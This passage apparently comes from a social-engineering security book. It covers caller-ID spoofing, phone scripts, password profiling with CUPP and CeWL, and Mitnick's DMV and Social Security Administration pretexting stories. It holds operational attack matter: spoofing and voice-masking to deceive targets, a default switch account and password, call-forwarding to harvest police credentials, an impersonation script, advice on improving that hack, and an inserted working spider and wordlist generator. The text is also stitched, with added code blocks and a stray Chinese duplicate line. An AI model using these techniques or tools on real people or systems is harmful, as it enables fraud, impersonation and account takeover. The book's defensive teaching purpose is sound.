One of the most popular methods of caller ID spoofing is by using a SpoofCard (www.spoofcard.com/). Using one of these cards, you call up the 800 number given to you on the card, enter your PIN, the number you want the caller ID to display, and then the number you want to call.

Some new features of the SpoofCard offer you the ability to record the phone conversation and mask your voice to be male or female. These features maximize the ability to hide who is calling and trick the target into divulging information the social engineer seeks.

On the plus side, SpoofCard is simple to use, it needs no extra hardware or software other than your phone, and it has proven service with thousands of customers. The only real negative to SpoofCard is the cost involved to purchase it.

SpoofApp

With so many people using smart phones like the iPhone, Android, or the Blackberry, there has been an influx of apps created to assist in caller ID spoofing. SpoofApp uses SpoofCards (see the preceding section) but bundles the features into a package on your cell phone.

Instead of having to call a toll-free number, you simply enter the number you want to call into the application, then enter the number you want to display, and SpoofApp connects you to the target, displaying the information you requested to the target. All of this is as simple as a click of a button.

Asterisk

If you have a spare computer and a VoIP service you can also use an Asterisk server to spoof caller IDs. You can find some information about this method at www.social-engineer.org/wiki/archives/CallerIDspoofing/CallerID-SpoofingWithAsterisk.html. Spoofing with an Asterisk server works much like SpoofCard, with the exception of who runs the server used to spoof the ID. In this case, you own the server. This is attractive because it allows for more freedom and there is no fear of being cut off or minutes running out.

The positive aspects of Asterisk are that it is free, it’s easy to use and flexible after setup, and you alone control it. Minuses include that an extra computer or VM is needed, Linux knowledge is required, and you need a current VoIP service provider.

The great part about this option is that all the information about the caller and the person called resides with the social engineer. Personal and account data are not in the hands of a third party.

Using Scripts

The telephone is a favorite tool of the social engineer. It offers anonymity as well as the ability to practice on numerous targets by changing just slight parts of the pretext.

One aspect of using the phone in social engineering that you must consider is the use of scripts. Scripting can be an essential part in ensuring that all the needed elements are covered and touched on; however, a script should not be a word-for-word speech to be given. Nothing irritates the target more than to be presented with a person who sounds like he is reading a script.

After you write a script you should practice it over and over so you sound real, genuine, and believable.

This is where your information-gathering sessions will become vital. The better the information the social engineer gathers, the clearer the script will become. I find it useful to read a few facts on the hobbies and interests of the target so I can use that to build rapport.

Once you have all the information laid out it can be helpful to then outline a plan of attack. In the case discussed previously—the CEO of the printing company—I had to develop an outline that would allow me to utilize the key parts of my pitch, high points I wanted to hit, as well as notes to myself like, “speak clearly,” “don’t forget to push the charity,” “slow down,” and so on, which kept me focused during the call.

Using a script or outline versus a fully written out manuscript will keep you fluid and natural and allow creative freedom when presented with things you didn’t plan for.

The telephone is still a deadly tool for the social engineer and when used with the principles mentioned so far in this book, it can lead a social engineer down the path of success.

Password Profilers

Another set of tools that bears mentioning helps you profile targets and the passwords they may use. After you have all the information on a target you can gather, your next step is to develop a profile. A profile is where you plan out a few attack vectors you feel will work and also where you can start to build a list of potential passwords to try in brute force attacks. From a tool perspective, having a list of possible passwords can assist in expediting a hack if you are presented with that option. This section covers a couple of profilers that are available.

Password profiling tools can take hours or even days off the work that you need to do.

Each year the number of people falling prey to simple attacks increases, despite the many warnings that are issued. The number of people who list all sorts of information about themselves, their families, and their lives on the Internet is amazing. Combining a profile built from their social media usage, what is found elsewhere on the web, and using the tools discussed subsequently, a social engineer can outline a person’s whole life.

One of the reasons this works so well is the way that many people choose their passwords. It has been proven that many people will use the same password over and over again. What is worse is that many people choose passwords that can be easily guessed with little to no skill.

Recently, BitDefender, an Internet security firm, performed a study that proved this fact. BitDefender analyzed the password usage of more than 250,000 users. The results were amazing: 75% of the 250,000 used the same passwords for email as well as all social media accounts. This should be especially scary considering the recent story of how 171 million Facebook users had their personal information released on a torrent. The full story can be found at www.securityweek.com/study-reveals-75-percent-individuals-use-same-password-social-networking-and-email.

In 2009 a hacker by the nickname of Tonu performed a very interesting bit of research. With no malicious intent he obtained a recently dropped URL of a popular social media site. He spoofed the page, then for a brief period of time logged the attempts of people trying to log in.

You can view the results at www.social-engineer.org/wiki/archives/BlogPosts/MenAndWomenPasswords.html.

Some of this data will shock even the most seasoned security professionals. Out of 734,000 people, 30,000 used their first name as a password and almost 14,500 used their last name. Although those numbers are shocking, what was found next was mind blowing—the top eight most commonly used passwords are outlined in the following table.

Password     Gender   Number of Users
123456       M        17601
password     M        4545
12345        M        3480
1234         M        2911
123          M        2492
123456789    M        2225
123456       F        1885
qwerty       M        1883

17,601 males used the password 123456? Staggering statistics.

If this isn’t shocking enough, Tonu posted statistics that more than 66% of the users on that list used passwords that were six to eight characters long. With the information that most people have simple passwords, using a popular password-cracking tool, like Cain and Abel shown in Figure 7-27, to crack a simple password is not unreasonable for a social engineer to do.

You will notice that the Time Left box says 3.03909 days. To most hackers, three days is a short time to wait to be given clear access to the servers. Is three days really that long to wait for the administrator password?

To make this information really hit home, look at Figure 7-28, which shows the difference made if the same user were to use a 14–16 character password containing upper and lower case as well as non-alphanumeric characters.

Figure 7-27: Only three days to crack a simple password.

Figure 7-28: The Time Left box has increased to trillions of years.

Does more than 5 trillion years seem a little long to wait? By just increasing the characters to 14 and using some non-basic characters (that is, *, &, $, %, and ^) the odds of a hacker obtaining the password through brute force become next to impossible.
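
To see where the jump from days to trillions of years comes from, the following added example (not from the book or from Cain and Abel) computes the size of the search space for a length range and character set and converts it to worst-case time at a guess rate. The guess rate, the lengths and the character classes are assumptions, since the figures do not state Cain's settings.

```python
"""Why 6-8 lowercase characters fall in days while 14-16 mixed characters take
trillions of years: search-space arithmetic. Added example, not from the book;
the guess rate below is an assumption, not a figure from Cain and Abel."""

# Character-set sizes (assumed classes for the two figures discussed above)
LOWERCASE = 26                  # a-z
MIXED_CASE_DIGITS = 26 + 26 + 10
PRINTABLE_ASCII = 95            # upper, lower, digits and symbols such as * & $ % ^


def keyspace(charset_size: int, min_len: int, max_len: int) -> int:
    """Number of distinct candidates of every length from min_len to max_len."""
    if charset_size < 1 or min_len < 1 or max_len < min_len:
        raise ValueError("need charset_size >= 1 and 1 <= min_len <= max_len")
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def exhaustive_search_seconds(charset_size, min_len, max_len, guesses_per_second):
    """Worst-case time to try every candidate at a fixed guess rate."""
    return keyspace(charset_size, min_len, max_len) / guesses_per_second


def implied_guess_rate(charset_size, min_len, max_len, seconds):
    """Guess rate a cracker must sustain to exhaust the space in `seconds`;
    useful for back-calculating what a reported Time Left figure assumed."""
    return keyspace(charset_size, min_len, max_len) / seconds


def format_duration(seconds: float) -> str:
    """Human-readable duration in the units a Time Left box would show."""
    minute, hour, day, year = 60, 3600, 86400, 365.25 * 86400
    if seconds < minute:
        return f"{seconds:.2f} seconds"
    if seconds < hour:
        return f"{seconds / minute:.2f} minutes"
    if seconds < day:
        return f"{seconds / hour:.2f} hours"
    if seconds < year:
        return f"{seconds / day:.2f} days"
    years = seconds / year
    return f"{years:.2f} years" if years < 1e6 else f"{years:.3g} years"


def compare_policies(guesses_per_second: float) -> dict:
    """Worst-case search time for the two password styles the text contrasts:
    6-8 lowercase characters versus 14-16 characters drawn from all printable ASCII."""
    weak = exhaustive_search_seconds(LOWERCASE, 6, 8, guesses_per_second)
    strong = exhaustive_search_seconds(PRINTABLE_ASCII, 14, 16, guesses_per_second)
    return {"weak": format_duration(weak),
            "strong": format_duration(strong),
            "ratio": strong / weak}


if __name__ == "__main__":
    RATE = 1_000_000   # assumed guesses per second, for illustration only
    for name, value in compare_policies(RATE).items():
        print(f"{name}: {value}")
```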

 

Because many users don’t use this level of complexity, identifying the weakness in many users’ passwords is not difficult. Certain tools (a couple of which are described in the next section) help profile potential passwords a user may have chosen.

Common User Password Profiler (CUPP)

Profiling a person is one of the main aspects of a successful social engineering audit. As previously discussed, Tonu’s research shows that out of 734,000 people, more than 228,000 of them used only six characters in their passwords. More than 17,000 of those chose to use the password of “123456” and close to 4,600 chose the word “password” as their password.

Common User Password Profiler (CUPP) is a tool that was created to make password profiling an easy task.

Murgis Kurgan, also known as j0rgan, created this amazing little tool. It runs as a script in the leading penetration testing distribution, BackTrack, or you can download it from www.social-engineer.org/cupps.tar.gz.

The most common form of authentication is the combination of a username and a password or passphrase. If both match values stored within a locally stored table, the user is authenticated for a connection. Password strength is a measure of the difficulty involved in guessing or breaking the password through cryptographic techniques or library-based automated testing of alternate values.

A weak password might be very short or only use alphanumeric characters, making decryption simple. A weak password can also be one that is easily guessed by someone profiling the user, such as a birthday, nickname, address, name of a pet or relative, or a common word such as God, love, money, or password.

Because most users have weak passwords that can be easy to guess, CUPP is a perfect tool for profiling. It can be used for legal penetration tests or forensic crime investigations.

The following is a copy/paste from a session using CUPP in BackTrack 4:

root@bt4:/pentest/passwords/cupp# ./cupp.py -i
[+] Insert the information about the victim to make a dictionary [low cases!]
[+] If you don’t know all the info, just hit enter when asked! ;)
> Name: John
> Surname: Smith
> Nickname: Johnny
> Birthdate (DDMMYYYY; i.e. 04111985): 03031965
> Wife’s(husband’s) name: Sally
> Wife’s(husband’s) nickname: Sals
> Wife’s(husband’s) birthdate (DDMMYYYY; i.e. 04111985): 05011966
> Child’s name: Roger
> Child’s nickname: Roggie
> Child’s birthdate (DDMMYYYY; i.e. 04111985): 05042004
> Pet’s name: Max
> Company name: ABC Paper
> Do you want to add some key words about the victim? Y/[N]: Y
> Please enter the words, separated by comma. [i.e. hacker, juice, black]: christian,polish,sales person
> Do you want to add special chars at the end of words? Y/[N]: N
> Do you want to add some random numbers at the end of words? Y/[N]n
> Leet mode? (i.e. leet = 1337) Y/[N]: Y
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to John.txt, counting 13672 words.
[+] Now load your pistolero with John.txt and shoot! Good luck!

Notice at the end that a dictionary file of 13,672 passwords was created using the information provided. The power of this type of tool is that it can take a lot of the guesswork out of the password-guessing aspect of social engineering.

CeWL

As described by its authors, CeWL is a Ruby application that spiders a given URL to a specified depth, optionally following external links, and returns a list of words that can then be used for password crackers such as John the Ripper. For more information about CeWL see its website at www.digininja.org/projects/cewl.php. Take a look at a session using CeWL in BackTrack4:

root@bt:/pentest/passwords/cewl# ruby cewl.rb --help
cewl 3.0 Robin Wood (dninja@gmail.com) (www.digininja.org)
Usage: cewl [OPTION] ... URL
  --help, -h: show help
  --depth x, -d x: depth to spider to, default 2
  --min_word_length, -m: minimum word length, default 3
  --offsite, -o: let the spider visit other sites
  --write, -w file: write the output to the file
  --ua, -u user-agent: useragent to send
  --no-words, -n: don’t output the wordlist
  --meta, -a file: include meta data, optional output file
  --email, -e file: include email addresses, optional output file
  --meta-temp-dir directory: the temporary directory, default /tmp
  -v: verbose
  URL: The site to spider.
root@bt:/pentest/passwords/cewl# ./cewl.rb -d 1 -w pass.txt http://www.targetcompany.com/about.php
root@bt:/pentest/passwords/cewl# cat passwords.txt |wc -l
430
root@bt:/pentest/passwords/cewl#

本次会话使用 CeWL 针对目标公司,仅在其网站的一个页面上就生成了 430 个潜在密码供尝试。

Using CeWL against a target company, this session generated 430 potential passwords to try from just one page on their web presence.

 

CUPP and CeWL are just two of the tools at your disposal to help profile a target and generate lists of potential passwords. An interesting exercise is to run one of these tools using your own information and see whether any password you use appears in the lists generated. It can be very sobering and make you take password security very seriously.
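
The block below is an added example written for this edition of the page; it is not code from CeWL, CUPP, or the book's author. It reimplements the idea behind the session above in Python: spider a starting URL to a given depth (CeWL's -d), stay on the target's host unless off-site crawling is allowed (-o), drop words shorter than a minimum length (-m), pull e-mail addresses out of the raw HTML (-e), and then apply the kind of profile-based mangling CUPP does (case variants plus common suffixes and any years found on the site). The "site" it crawls is a constructed in-memory dictionary so the example runs offline; the hostnames, page text, e-mail address and founding year are all made up.

```python
# Added example, not CeWL's or CUPP's own code: a CeWL-style spider and
# wordlist builder with CUPP-style mangling, run against a constructed
# in-memory site so it works offline. Hostnames, page text, the e-mail
# address and the founding year below are all made up.
import re
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

WORD_RE = re.compile(r"[A-Za-z][A-Za-z0-9]*")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
YEAR_RE = re.compile(r"\b(?:19|20)\d{2}\b")


class _PageParser(HTMLParser):
    """Collects visible text (skipping <script>/<style>) and href targets."""

    def __init__(self):
        super().__init__()
        self.text, self.links, self._skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        elif tag == "a":
            self.links += [v for k, v in attrs if k == "href" and v]

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.text.append(data)


def spider(fetch, start_url, depth=2, offsite=False):
    """Breadth-first crawl like CeWL's -d/-o; depth 0 is the start page only.
    fetch(url) returns HTML or None. Returns [(url, visible_text, raw_html)]."""
    start_host = urlparse(start_url).netloc
    seen, queue, pages = {start_url}, [(start_url, 0)], []
    while queue:
        url, level = queue.pop(0)
        raw = fetch(url)
        if raw is None:
            continue
        page = _PageParser()
        page.feed(raw)
        page.close()
        pages.append((url, " ".join(page.text), raw))
        for href in (page.links if level < depth else []):
            nxt = urljoin(url, href).split("#", 1)[0]
            parts = urlparse(nxt)
            if parts.scheme not in ("http", "https") or nxt in seen:
                continue  # skips mailto:, duplicates and fragment variants
            if not offsite and parts.netloc != start_host:
                continue  # stay on the target's host unless -o is wanted
            seen.add(nxt)
            queue.append((nxt, level + 1))
    return pages


def wordlist(pages, min_len=3):
    """Unique words of at least min_len characters, most frequent first (-m)."""
    counts = Counter()
    for _, text, _ in pages:
        counts.update(w for w in WORD_RE.findall(text) if len(w) >= min_len)
    return [w for w, _ in counts.most_common()]


def emails(pages):
    """Addresses taken from the raw HTML so mailto: links are caught too (-e)."""
    return sorted({m for _, _, raw in pages for m in EMAIL_RE.findall(raw)})


def years(pages):
    """Four-digit years mentioned on the site; founding dates make common suffixes."""
    return sorted({y for _, text, _ in pages for y in YEAR_RE.findall(text)})


def mangle(words, suffixes=("", "1", "123", "!"), years=()):
    """CUPP-style expansion: case variants times common and year suffixes."""
    out, seen = [], set()
    for word in words:
        for base in (word, word.lower(), word.capitalize(), word.upper()):
            for cand in (base + s for s in tuple(suffixes) + tuple(years)):
                if cand not in seen:
                    seen.add(cand)
                    out.append(cand)
    return out


# Constructed stand-in for the spidered target; every URL and value is made up.
START = "http://www.targetcorp.test/about.php"
SITE = {
    START: """<html><head><title>About TargetCorp</title><style>h1{color:red}</style>
</head><body><h1>About TargetCorp</h1><p>TargetCorp was founded in 1998 by Alice
Walker. Our Pittsburgh headquarters serves 400 employees.</p><p>Press:
<a href="mailto:press@targetcorp.test">press@targetcorp.test</a></p>
<a href="/team.html">Meet the team</a> <a href="http://partner.example.test/">Partner</a>
<script>var secretWord = "javascriptOnly";</script></body></html>""",
    "http://www.targetcorp.test/team.html": """<html><body><h2>Leadership</h2><ul>
<li>Alice Walker, CEO</li><li>Bob Ortega, CTO</li></ul><p>Mascot: Rex the golden
retriever. Est. 1998.</p><a href="/careers.html">Careers</a></body></html>""",
    "http://partner.example.test/": "<html><body>Partner Portal</body></html>",
}
```

Running `spider(SITE.get, START, depth=1)` is the offline equivalent of the `-d 1` session above; `wordlist()` puts the company name first because it appears most often, and `"Pittsburgh1998" in mangle(wordlist(pages), years=years(pages))` is the sobering self-check the paragraph suggests, done against a founding year lifted from the site itself. To use it against a real target, pass a function that performs an HTTP GET in place of `SITE.get`, and only against sites you are authorized to test: a depth-2 crawl with off-site links allowed fans out far beyond the target very quickly.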

 

Summary

Tools are an important aspect of social engineering, but they do not make the social engineer. A tool alone is useless; the knowledge of how to leverage and utilize that tool is invaluable.

If one overwhelming theme in this chapter resounds, it is that practice makes perfect. Whether you are using the phone, software-based tools, the web, or other spy gadgets, practicing how to use them is essential to success. For example, when using the phone for social engineering you can use spoofing technologies or even voice-changing technologies, and while having all this technology is impressive, if you make a call and sound too scripted, nervous and jittery, or unprepared and uninformed, then all hope of social engineering success is lost, and most likely any credibility too. This principle goes back to being very well versed in pretexting. How would the person you are trying to impersonate talk? What would he say? How would he say it? What knowledge would he possess? What information would he ask for?

Whether the social engineer uses a software tool, a hardware tool, or both, taking the time to learn the ins and outs of each tool and each feature can make or break the success of the audit.

Tools can take substantial time off audits, and they can also fill gaps in an auditor's skills. This dynamic becomes apparent as you analyze the case studies in Chapter 8.

Chapter 8

Case Studies: Dissecting the Social Engineer

The best security is through education.

—Mati Aharoni

Throughout this book I go through each aspect of what makes a great social engineer. Putting the information in these pages into play can make a social engineer a force to be reckoned with.

In school, students review history to learn what should and should not be done. History is a great tool for educating us about what has worked in the past and why. It can tell us where we are going and how we can get there.

Social engineering history is not so different. Throughout the history of business, people have been there to scam and steal, and others have devoted their lives to securing against those bad actors.

Discussing the details of professional social engineering attacks is often difficult because they were either carried out illegally or cannot be openly discussed because of client contracts. Fortunately, Kevin Mitnick, world-famous social engineer and computer security expert, has published many of his stories for our reading pleasure. I have taken some of these stories from his book The Art of Deception.

In this chapter I pick two of Mitnick's most famous stories from his books, give a brief recap of what happened, analyze which aspects of social engineering were used, and discuss what everyone can learn from each.

After dissecting those two accounts I do the same with two of my own accounts, which demonstrate how easy it is to obtain information and how easily that information can be used to compromise an entire company. Finally, I disclose two "top-secret" stories whose sources I cannot even mention, but as you will see, you will learn a lot from these accounts. My aim is to show you how dangerous even little bits of information can be, and how devastating they are in the hands of a skilled social engineer. At the same time, you will see where a social engineer can learn from past successes and failures to enhance their own skill set.

Let's get started with the first case study.

Mitnick Case Study 1: Hacking the DMV

Kevin Mitnick is widely known as one of the world's most notorious social engineers. He has performed some of the boldest and most famous exploits in the world, and the exploit examined here is especially so.

A driver's license can often come in handy for obtaining information on people. Having the target's driver's license number can allow a social engineer to gain all sorts of personal information. However, no free service exists that allows a person to gain access to this information; a social engineer or private investigator must go to some lengths to obtain it and then use it against a target.

Kevin Mitnick, in his book The Art of Deception, tells a story he called "The Reverse Sting." The following sections provide some background information and an analysis of this account.

The Target

In one of Mitnick's greatest stories, he describes how "Eric" wanted to use the non-public Department of Motor Vehicles (DMV) and police systems to obtain people's driver's license numbers. He regularly needed to obtain license information on targets. Eric had a method of obtaining this information, but he feared that repeated social engineering calls would eventually make calling the DMV useless or alert the police to his ways.

He needed a different method of accessing the DMV's network, and with some knowledge of how the DMV works he knew just how to do it. His target was twofold: not only the DMV but also the police would assist him (without knowing it, of course) in accomplishing his goal of obtaining this information.

The Story

Eric knew that the DMV could give privileged information to insurance agencies, private investigators (PIs), and certain other groups. Each industry has access to only certain types of data.

An insurance company is privy to different information than a PI, whereas a law enforcement agent can get it all. Eric's goal was to get all the information.

Obtaining an Unpublished DMV Phone Number

Eric took a few steps that really proved his excellent social engineering skills. First he called directory assistance and asked for the phone number of DMV headquarters. Of course, the number he was given was the public one, and what he wanted was something that would get him deeper.

He then called the local sheriff's office and asked for Teletype, the office through which communications are sent to and received from other law enforcement agencies. When he reached the Teletype department, he asked the person there for the number that law enforcement would use when calling DMV headquarters.

Now I don't know about you, but that seems like it would fail. It just about did:

"Who are you?" he was asked.

He had to think quickly and responded, "This is Al. I was calling 503-555-5753."

All he did was give a random number with the same area code and prefix, making up the last four digits. Then he just shut up. The officer made some assumptions:

  • He was internal and already had the number for a non-public area (Teletype).
  • He already had almost all of the DMV's number.

With those two facts firmly in his mind, the officer assumed that Eric was allowed in and gave him the number. Eric wanted more than one number, though; he wanted as many as he could get his hands on.

Accomplishing this goal would require an even deeper hack: a multi-level, multi-faceted attack with many different avenues. It would be of epic proportions.

Gaining Access to the State's Phone System

Eric called the number he had been given for the DMV. He told the DMV representative that he was from Nortel and needed to speak to a technician because he worked with the DMS-100, a widely used switch.

When he was on with the technician, he claimed to be with the Nortel Technical Assistance Center in Texas and explained that he was updating all the switches. The update would be done remotely, and the technician would not need to do anything except provide the dial-in number for the switch so that Eric could perform the update directly from the Technical Assistance Center.

This story sounded completely believable, so the technician complied, giving Eric all the information he requested. Armed with this information, he could now dial directly into one of the state's telephone switches.

Getting a Password

The next hurdle was one that could have stopped the whole hack dead in its tracks: getting a password. The Nortel switch that the DMV used was password protected. From past experience with Nortel switches, Eric knew that Nortel used a default user account, NTAS. Eric then dialed in several times, trying the standard passwords he had encountered:

  • NTAS: fail
  • The account name: fail
  • Helper: fail
  • Patch: fail
  • Update: SUCCESS

Wow, really? The password was "update". He now had full control over the switch and every line connected to it. He queried the telephone lines that were his target and quickly found that 19 phone lines went to the same department.

After checking some of the switch's internal setup, he found that the switch was programmed to hunt through the 19 lines until it found one that was not busy. He picked line 18 and entered the standard forwarding code that added a call-forwarding command to that phone line.

Eric bought a cheap, prepaid cell phone that could be disposed of easily. He entered that number as the number to forward to whenever line 18 rang. Basically, as soon as the DMV got busy enough to have callers on 17 lines, the 18th call would not ring at the DMV but on Eric's cell phone.

It wasn't long until that started happening. Around 8:00 a.m. the next morning the cell phone started to ring. Each time, it was a police officer looking for information on a person of interest. He would field calls from police at his house, at lunch, in the car; no matter where he was, he pretended to be the DMV representative.

What made me personally get a good laugh was how the calls reportedly went:

The cell phone would ring and Eric would say, "DMV, may I help you?"

"This is Detective Andrew Cole."

"Hi Detective, what can I do for you today?"

"I need a Soundex on driver's license 005602789."

"Sure, let me bring up the record." While he simulated working on a computer he asked a couple of questions: "Detective Cole, what is your agency?"

"Jefferson County."

Eric would then launch into the following questions: "What is your requestor code?" "What is your driver's license number?" "What is your date of birth?"

As the officer gave all his personal information, Eric would pretend to verify it. Then he would feign confirmation and ask what details the officer needed on his call. He would pretend to look up the name and other information, then say, "My computer just went down again. Sorry, detective, my computer has been on the blink all week. Would you mind calling back and getting another clerk to help you?"

This would be a little irritating for the officer, I am sure, but it tied up all the loose ends. In the meantime, Eric now owned that officer's identity. He could use this information for many things, but mostly to obtain information from the DMV whenever he needed it.

He did his DMV information gathering for a few hours, then called back into the switch and disabled the call forwarding; he now had a juicy list of information in his possession.

For months after this hack, Eric could easily dial back in, enable call forwarding on the switch, collect a number of officers' details, disable call forwarding, and then use those police credentials to obtain valid driver's license information, which he would sell to private investigators or others who would not ask how he had obtained it.

Applying the SE Framework to the DMV Hack

In the story, Kevin identified some things that Eric did, and attitudes he had, that made him successful, such as not being afraid or uncomfortable talking to police and being able to find his way around unfamiliar areas.

You can also identify which parts of the social engineering framework Eric used and how he used them.

For example, the first step in any successful social engineering audit or attack is information gathering. In this account you can see that Eric must have really done his homework before the attack. He knew a lot about the phone system, the way the DMV operates, and the general workings of the process he wanted to infiltrate. I am not sure how long ago this attack occurred, but nowadays making an attack like it is even easier because of the Internet, which is a goldmine for information gathering. Just a couple of years ago someone figured out a hack for a Tranax ATM, and within a few weeks manuals containing step-by-step instructions for performing the attack were available on the Internet.

Also, as mentioned previously in this book, choosing a pretext that mimics what you do in real life, or things you did in the past, can increase your chance of success. The power lies in the fact that, because the pretext is more "realistic" to you, it helps you gather information as well as breach the target. Eric seemed to have a very intimate knowledge of this field.

As you may recall, the next part of the framework is elicitation, or being able to cleverly craft questions to obtain information or access to something you want. Eric elicited information masterfully. When on the phone with the police, Eric's use of elicitation served as the proof that he was who he said he was and knew his "job" well. He knew the lingo and asked routine questions that had to be answered. As a matter of fact, not asking those questions would probably have raised more of an alarm than asking them. That is the power of good elicitation tactics.

Early on, Eric knew he had to obtain certain phone numbers to perform the attack. Instead of trying to explain why he needed certain information, he used an assumptive close, as mentioned in Chapter 3, and asked questions that basically stated, "I deserve these answers now, so tell me what I am asking." This is another example of powerful elicitation; you can learn a lot from analyzing his methods closely.

Most good attacks also include a very high amount of pretexting. This account was no exception. Eric had to develop a few pretexts in this attack vector, switching gears many times to accomplish his goals. As impressive as it is that Eric impersonated law enforcement (which he did very well), keep in mind that this practice is highly illegal in the United States. You can learn much from the process and methods Eric used, but be cautious how you apply them. Even in a paid social engineering audit, impersonating a law enforcement agent is illegal.

Know your local laws; that is the lesson. Despite the fact that it was illegal, you can learn a lot from analyzing Eric's attitude in this hack. He was always collected. When he put on the pretext of the DMV agent, he was able to use elicitation that served as his proof. When he put on the police pretext, his demeanor, voice, and phrases all backed up the pretext. Switching gears can be hard for many people, so it is best to practice before you go "live" with this.

Eric's pretexts were solid, and he did a masterful job of holding them together, especially when he had to act as a DMV agent and field real calls from police. In many circumstances he could easily have fallen out of character, but he seemed to hold it together quite well.

Many of the techniques used for the psychological aspects of social engineering, such as eye cues and microexpressions, were not used in this attack because it happened mostly over the phone. Eric did have to utilize certain aspects of the framework, though, such as rapport building, NLP (neurolinguistic programming), and modes of thinking.

Eric seemed to be a natural at building rapport. He was personable and easygoing, he seemed not to be afraid of the "what ifs," and he was able to be, and act, confident in his abilities. He pitched his voice and his conversation in a way that gave the person on the other end of the phone every reason to trust him and no reason to doubt him.

Eric used impressive interrogation and interview tactics, even on law enforcement agents who are themselves experienced in interview tactics. He used those tactics so successfully that his methods went undetected and he obtained all the information he wanted.

Eric also seemed to have an excellent grasp of influence tactics and the ability to use them. Probably the most noticeable in this attack was when he asked the police officer to call back and get a different DMV agent. This was probably annoying for the officer, but what made the tactic successful is that Eric "gave" the officer something first. That is, he "verified" the data the officer needed, and it was only when he was supposed to give the officer the final piece of information that the "computer" froze.

By applying some rules of influence, Eric was easily able to get the officers to comply.

Closely linked to Eric's pretexts was his ability to use framing successfully. To refresh your memory, framing is bringing the target in line with your thinking by positioning yourself and your stories to make them believable. It is an important piece of the pretexting puzzle that makes you stand out and proves to the target that you certainly are who you say you are. Eric's pretexts were great and believable, but what really sold them were the frames he used. His frame changed depending on whom he was talking to. At one point he had to make sure the Teletype officer on the other end would give him the number he wanted; on another call he had to be a knowledgeable and skilled DMV agent.

Eric made himself believable through framing: by assuming he would get the information he asked for, showing no fear in his dealings, and confidently asking for information he "felt" he was owed. All these attitudes framed the target to accept his pretext and allowed for natural responses.

As you can see, you can learn much by analyzing Eric's social engineering attack. One can only assume that Eric had either practiced all these methods or done a few dry runs to know all he did about the internal systems used in the attack.

Eric's methods worked out for him and were successful, but I would have taken a couple of extra precautions. For example:

  • When he was fielding DMV calls, I would have made sure I forwarded the number only when I was in the "office." I would have set up an office area with some background office noise and had the proper supplies to take down all the information I needed, to avoid the risk of a waitress or friend blowing my cover.
  • Although a disposable cell phone is a good idea for tracing purposes, another technique is to have that number forward to a Google Voice or Skype number. I tend not to trust cell signals, and nothing could have ruined the gig faster than having the call drop or having a weak, static-filled signal.

Beyond these items there is little to improve in this hack. Eric did a superb job of making sure it was done right, using many of the talents and skills in the framework to accomplish his goal.

Mitnick Case Study 2: Hacking the Social Security Administration

Mitnick mentions a man he called Keith Carter, a less-than-honorable private investigator hired to do some digging into a man who was hiding funds from his soon-to-be-estranged wife. She had funded his venture, which had grown into a multimillion-dollar company.

The divorce was almost settled, but the woman's attorneys needed to find the "hidden assets." This attack vector is interesting because, as in the first case study, the story follows a very shady method of gathering intelligence.

The Target

The goal was to find the assets of the husband, "Joe Johnson," but that was not the target of the actual social engineering attack. To obtain information on Joe, the private investigator, Keith, had to hack the Social Security Administration (SSA).

Many times in a social engineering audit this option will present itself. This section covers some of the methods he used to accomplish this goal, but suffice it to say that hacking the SSA is a very slippery slope. As the story unfolds you will see how dangerous this particular hack was.

The Story

Joe Johnson was married to a very wealthy woman. He had knowingly used tens of thousands of her dollars to invest in one of his ideas, and that idea grew into a multimillion-dollar organization.

As things happen, their marriage was not too solid, so they decided to divorce. During the divorce proceedings, the soon-to-be ex-Mrs. Johnson "knew" he was hiding his money, trying to keep it out of the divorce settlement.

She hired Keith, a less-than-ethical private investigator who didn't mind riding the edge of what was legal and what was not to obtain the information he needed to make the case.

As Keith sat down to analyze the case, he determined that a good starting point was the Social Security Administration. He thought that if he could just obtain Joe's records he would be able to find some discrepancies and then nail the coffin shut. He wanted to be able to freely call Joe's banks, investment firms, and offshore accounts pretexting as Joe. To do so he needed some detailed information, which is what led him down the path of hacking the Social Security office.

Keith began with basic information gathering. He went online and found a guide describing the SSA's internal systems and their internal terminology and jargon. After studying it and getting the jargon down pat, he called the public number of the local Social Security office. When he got a live person he asked to be connected to the claims office. The conversation went like this:

"Hi, this is Gregory Adams, District Office 329. Listen, I am trying to reach a claims adjuster who handles an account number that ends in 6363, and the number I have goes to a fax machine."

"Oh, that is Mod 3, the number is…"

Really? That easy? Wow. In a few moments he had the number of an internal office phone that the public normally cannot get. Now came the hard part.

He had to call Mod 3, change his pretext, and obtain useful information on Joe. Thursday morning came around, and Keith had his plan well laid out. He picked up the phone and dialed the Mod 3 number:

"Mod 3. This is May Linn Wang."

"Ms. Wang, this is Arthur Arondale, in the Office of the Inspector General. Can I call you 'May'?"

"It's 'May Linn'," she said.

"Well, it's like this, May Linn. We have a new guy who doesn't have a computer yet, and right now he has a priority project to do so he's using mine. We're the government of the United States, for crying out loud, and they say they don't have enough money in the budget to buy a computer for this guy to use. And now my boss thinks I'm falling behind and doesn't want to hear any excuses, you know?"

"I know what you mean, all right."

"Can you help me with a quick inquiry on MCS?" he asked, using the name of the computer system for looking up taxpayer information.

"Sure, what do you need?"

"The first thing I need you to do is an alphadent on Joseph Johnson, DOB 7/4/69." (Alphadent means having the computer search for an account alphabetically by taxpayer name, further identified by date of birth.)

"What do you need to know?"

"What's his account number?" Keith asked (the "account number" he was asking for is Joe's Social Security number).

She read it off.

"Okay, I need you to do a numident on that account number." (Numident is similar to alphadent, only it is a numerical search instead of an alphabetical one.) This was a request for her to read off the basic taxpayer data, and May Linn responded by giving the taxpayer's place of birth, mother's maiden name, and father's name. Keith listened patiently while she also gave him the month and year Joe's Social Security number was issued and the district office that issued it.

Keith next asked for a DEQY (pronounced "DECK-wee"; short for "detailed earnings query").

"For what year?"

"Year 2001."

May Linn said, "The amount was $190,286, and the payer was Johnson MicroTech."

"Any other wages?"

"No."

"Thanks," Keith said. "You've been very kind."

Keith then tried to arrange to call her whenever he needed information and "couldn't get to his computer," using a favorite trick of social engineers: always try to establish a connection so that you can keep going back to the same person, avoiding the nuisance of having to find a new mark each time.

